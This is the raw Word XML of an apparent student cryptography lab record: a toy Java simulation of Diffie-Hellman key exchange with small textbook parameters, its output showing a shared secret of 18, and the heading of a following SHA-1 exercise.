          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC0CF91" w14:textId="77777777" w:rsidR="00A16F47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239"/>
        <w:ind w:left="1079" w:hanging="311"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Alice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>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bob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now</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>share</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>a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secret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>number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pacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>18).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E7DA52" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="20"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23AF6451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AA839D1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="243"/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DiffieHellman.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BEB7DB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="79"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>DiffieHellman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9A0177D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="638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DB1E275" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>int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23;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publicly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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(prime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>number)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C49B0B8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="235"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>g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5;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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(primitive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>root)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>*/ int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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 xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220D5365" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>/*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Alice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>knows this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">secret </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74450748" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="917" w:right="4540"/>
      </w:pPr>
      <w:r>
        <w:t>int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3;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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Bob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*/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>double aliceSends = (Math.pow(g, x)) % p;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17353AD6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917" w:right="3449"/>
      </w:pPr>
      <w:r>
        <w:t>double</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>bobComputes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(Math.pow(aliceSends,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>y))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>p;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>double bobSends = (Math.pow(g, y)) % p;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701EE9F3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:line="242" w:lineRule="auto"/>
        <w:ind w:left="917" w:right="3449"/>
      </w:pPr>
      <w:r>
        <w:t>double</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>aliceComputes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(Math.pow(bobSends,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>x))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>p;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>double sharedSecret = (Math.pow(g, (x * y))) % p;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D01F0AF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("simulation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Diffie-Hellman</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11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algorithm\n-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7B4881" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="46"/>
        <w:ind w:left="43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2DCC0F86" wp14:editId="087C4FFD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>128040</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2548255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>
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="2547747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96E6F" id="Graphic 159" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:10.1pt;width:200.65pt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8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M9FwIAAF4EAAAOAAAAZHJzL2Uyb0RvYy54bWysVFGP2jAMfp+0/xDlfRTYMVBFOU2Hbpp0&#10;up10THsOaUqrpXFmBwr/fk5Kgd3epvUhsuMvzmd/Tpf3x9aKg0FqwBVyMhpLYZyGsnG7Qn7fPH5Y&#10;SEFBuVJZcKaQJ0PyfvX+3bLzuZlCDbY0KDiJo7zzhaxD8HmWka5Nq2gE3jgOVoCtCuziLitRdZy9&#10;tdl0PP6UdYClR9CGiHfXfVCuUv6qMjp8qyoyQdhCMreQVkzrNq7ZaqnyHSpfN/pMQ/0Di1Y1ji+9&#10;pFqroMQem79StY1GIKjCSEObQVU12qQauJrJ+E01r7XyJtXCzSF/aRP9v7T6+fDqXzBSJ/8E+idx&#10;R7LOU36JRIfOmGOFbcQycXFMXTxdumiOQWjenM7uFtPZTArNscl0npqcqXw4q/cUvhhIedThiUKv&#10;QTlYqh4sfXSDiaxk1NAmDYMUrCFKwRpuew29CvFcJBdN0V2JxL0WDmYDKRreMGdq16h1tyguZT6/&#10;m0sxVMnYHsFGvIZ71RvparZvi7Musph8nMwWaTYIbFM+NtZGGoS77YNFcVBxMtMXC+EUf8A8Ulgr&#10;qnscnSg6Z6B1Z6l6daJOWyhPLyg6HuhC0q+9QiOF/ep4YuL0DwYOxnYwMNgHSG8k9Yhv3Rx/KPQi&#10;EihkYHGfYZhHlQ+6xeov2HjSwed9gKqJoqYx6hmdHR7iVOL5wcVXcusn1PW3sPoNAAD//wMAUEsD&#10;BBQABgAIAAAAIQCJ7Sdj3QAAAAkBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyDtUjc&#10;qENwEA1xKkBCcAGpgUOPTrwkEfbajd00/D3uCY4zO5p9U20Wa9iMUxgdSbheZcCQOqdH6iV8fjxf&#10;3QELUZFWxhFK+MEAm/r8rFKldkfa4tzEnqUSCqWSMMToS85DN6BVYeU8Urp9ucmqmOTUcz2pYyq3&#10;hudZdsutGil9GJTHpwG77+ZgJay3e/FuXh5pxn1b+Nf+becbLeXlxfJwDyziEv/CcMJP6FAnptYd&#10;SAdmkhYibYkS8iwHlgKFKG6AtSdDAK8r/n9B/QsAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4A&#10;AADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAA&#10;IQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAA&#10;IQAbwwM9FwIAAF4EAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAI&#10;AAAAIQCJ7Sdj3QAAAAkBAAAPAAAAAAAAAAAAAAAAAHEEAABkcnMvZG93bnJldi54bWxQSwUGAAAA&#10;AAQABADzAAAAewUAAAAA&#10;" path="m,l2547747,e" filled="f" strokeweight=".365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");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A998276" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="204"/>
        <w:ind w:left="917" w:right="2222"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("Alice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Sends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aliceSends);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>System.out.println("Bob Computes : " + bobComputes); System.out.println("Bob Sends : " + bobSends); System.out.println("Alice Computes : " + aliceComputes);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2EBD9C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2CF438" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="71"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>System.out.println("Shared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: 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sharedSecret);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A1ED6C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="43"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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equality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rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1E236B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="1198" w:hanging="281"/>
      </w:pPr>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>((aliceComputes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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sharedSecret)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11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>(aliceComputes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bobComputes)) System.out.println("Success: Shared Secrets Matches! " + sharedSecret);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B41C23F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="41"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C5C6D4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("Error:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12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t>Secrets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Match");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026961A0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="43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1FD2E9DB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="206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796228E9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C865E2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33F97707" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04581EEA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43A6A28B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB6766D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74EA1BD2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="1" w:line="274" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>OUTPUT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543A3A87" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="274" w:lineRule="exact"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>simulation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Diffie-Hellman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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E434F8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7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4155B41" wp14:editId="625A84E2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>129636</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3850004" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom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50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004">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3849624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9BF1" id="Graphic 160" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:10.2pt;width:303.15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50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s8GQIAAF4EAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0X+wkbZcZcYqhQYcB&#10;RVegGXZWZDk2JouaqMTOvx8lfyTrbsN8EEjxiXrko7y+7xrNTsphDSbn81nKmTISitoccv599/hh&#10;xRl6YQqhwaicnxXy+837d+vWZmoBFehCOUZJDGatzXnlvc2SBGWlGoEzsMpQsATXCE+uOySFEy1l&#10;b3SySNO7pAVXWAdSIdLutg/yTcxflkr6b2WJyjOdc+Lm4+riug9rslmL7OCErWo50BD/wKIRtaFL&#10;p1Rb4QU7uvqvVE0tHSCUfiahSaAsa6liDVTNPH1TzWslrIq1UHPQTm3C/5dWPp9e7YsL1NE+gfyJ&#10;1JGktZhNkeDggOlK1wQsEWdd7OJ56qLqPJO0uVzdpml6w5mk2HzxMTY5Edl4Vh7Rf1EQ84jTE/pe&#10;g2K0RDVasjOj6UjJoKGOGnrOSEPHGWm47zW0wodzgVwwWXshEvYaOKkdxKh/w5yoXaLaXKOWq5tP&#10;dwsqZaySsD2CjHAN9ao34tVkXxenTWAxX85vV3E2EHRdPNZaBxroDvsH7dhJhMmMXyiEUvwBsw79&#10;VmDV4/CMwRmA2gxS9eoEnfZQnF8ca2mgc46/jsIpzvRXQxMTpn803GjsR8N5/QDxjcQe0a277odw&#10;lgUCOfck7jOM8yiyUbdQ/YQNJw18Pnoo6yBqHKOe0eDQEMcShwcXXsm1H1GX38LmNwAAAP//AwBQ&#10;SwMEFAAGAAgAAAAhAAsxULreAAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1&#10;SNyoTRtaFOJUFRUXJFBpuXBz422SYq+j2E3D37M9wXFmR7NviuXonRiwj20gDfcTBQKpCralWsPn&#10;7uXuEURMhqxxgVDDD0ZYltdXhcltONMHDttUCy6hmBsNTUpdLmWsGvQmTkKHxLdD6L1JLPta2t6c&#10;udw7OVVqLr1piT80psPnBqvv7clrUK+bL3WYvdNivTqq0Q/r3Zs7an17M66eQCQc018YLviMDiUz&#10;7cOJbBSOdZbxlqRhqjIQHFg8qBmI/cWYgywL+X9B+QsAAP//AwBQSwECLQAUAAYACAAAACEAtoM4&#10;kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAI&#10;AAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAI&#10;AAAAIQCZlKs8GQIAAF4EAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQA&#10;BgAIAAAAIQALMVC63gAAAAkBAAAPAAAAAAAAAAAAAAAAAHMEAABkcnMvZG93bnJldi54bWxQSwUG&#10;AAAAAAQABADzAAAAfgUAAAAA&#10;" path="m,l3849624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5D0E576" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="97"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79FFB1C3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="7731"/>
      </w:pPr>
      <w:r>
        <w:t>Alice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Sends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4.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Bob Computes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>: 18.0 Bob Sends : 10.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61537422" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="360" w:right="6855"/>
      </w:pPr>
      <w:r>
        <w:t>Alice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Computes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18.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Shared Secret : 18.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599B2493" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="41"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Success:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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Matches!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>18.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD70EA5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6859915A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F2A197D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D20AA8D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="093BAA69" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="510520B0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CC3CFA9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F026A6D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB99DE1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="260"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DEAA91C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5E669859" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="36" w:line="244" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="783" w:firstLine="719"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Thus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Diffie-Hellman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exchange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Java Program and the output has been verified successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EF6DDE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:spacing w:line="244" w:lineRule="auto"/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56A7D4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Calculate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digest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SHA-1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>algorithm.</w:t>
      </w:r>
    </w:p>
